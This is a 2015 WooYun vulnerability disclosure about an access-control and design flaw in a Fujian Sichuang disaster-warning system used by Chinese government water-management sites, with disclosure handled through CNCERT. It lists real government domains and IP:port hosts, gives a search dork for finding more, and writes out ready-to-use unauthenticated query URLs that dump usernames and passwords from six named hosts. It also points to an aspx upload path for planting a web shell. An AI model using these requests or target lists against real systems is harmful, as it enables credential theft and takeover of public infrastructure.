当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094844

漏洞标题:某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷

相关厂商:福建四创

漏洞作者: BMa

提交时间:2015-02-23 10:09

修复时间:2015-05-31 11:24

公开时间:2015-05-31 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-23: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-05: 细节向第三方安全合作伙伴开放
2015-04-26: 细节向核心白帽子及相关领域专家公开
2015-05-06: 细节向普通白帽子公开
2015-05-16: 细节向实习白帽子公开
2015-05-31: 细节向公众公开

简要描述:

某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷
管理审核时麻烦注意与其他的不同,我在乌云上没有找到类似的漏洞

详细说明:

应用官网:http://www.strongsoft.net/
关键字:intitle:预警 系统 技术支持:福建四创
部分举例:

shzh.wlfx.gov.cn/
218.86.6.48:3505/
yj.yywater.gov.cn/
222.216.218.28:8088/
219.159.102.99:8088/
218.86.96.98:3505/
111.12.51.221:8088/
222.242.107.62:4000/
fxb.lucheng.gov.cn/
183.233.205.85:9001/
222.83.214.58:8088/
180.130.175.138:3503/
hzh.wlfx.gov.cn
shzh.dqwater.gov.cn
218.86.6.48:3505
219.159.239.96:8088/


先说说越权:
以http://219.159.239.96:8088/为例,在后台测试中发现如下操作无需登录即可进行:

http://219.159.239.96:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserID,varchar&columns=UserID,UserName,UserPhone,ltrim(rtrim(UserStatus))|','|isnull((select top 1 Enuname from L03_ennuvaldep where enuval =convert(varchar(50),UserStatus)  and enucd='User_Status'),'') as UserStatus,convert(varchar,CreateTime, 120)  as CreateTime,ltrim(rtrim(DeptID))|','|isnull((select top 1 ltrim(rtrim(RoleName)) from Web_SystemUserRole where 1=1  and RoleID=Web_SystemUser.DeptID  ),'') as DeptID,1,ltrim(rtrim(RoleID))|','|isnull((select top 1 ltrim(rtrim(RoleName)) from L04_Role where 1=1  and RoleId=Web_SystemUser.RoleID  ),'') as RoleID,1,ltrim(rtrim(ADCD))|','|isnull((select top 1 ltrim(rtrim(ADNM)) from StrongWater.dbo.AD_Info_B where 1=1  and ADCD=Web_SystemUser.ADCD  ),'') as ADCD,1&_=1422623883495


1.jpg


观察语句,发现这就是一条内置的sql,这是一处设计缺陷,可以用来构造新的查询:

http://219.159.239.96:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


得到用户名密码:

2.jpg


3.jpg


后台getshell在:基础信息查询-行政信息基本情况-预案管理,可以直接上传aspx文件,返回路径
问题URL:

/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


其他例子:
第一个:

http://222.216.218.28:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


4.jpg


第二个:

http://219.159.102.99:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


5.jpg


第三个:

http://111.12.51.221:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


6.jpg


第四个:

http://183.233.205.85:9001/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


7.jpg


第五个:

shzh.dqwater.gov.cn/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


8.jpg


第六个:

http://yj.yywater.gov.cn//TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495


9.jpg


其他的就不举例了

漏洞证明:

其实这里应该是可以构造注入的
不尝试了!

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-02 11:22

厂商回复:

CNVD确认所述漏洞情况,已经转由CNCERT下发给福建分中心,由福建分中心后续协调网站管理单位处置。

最新状态:

暂无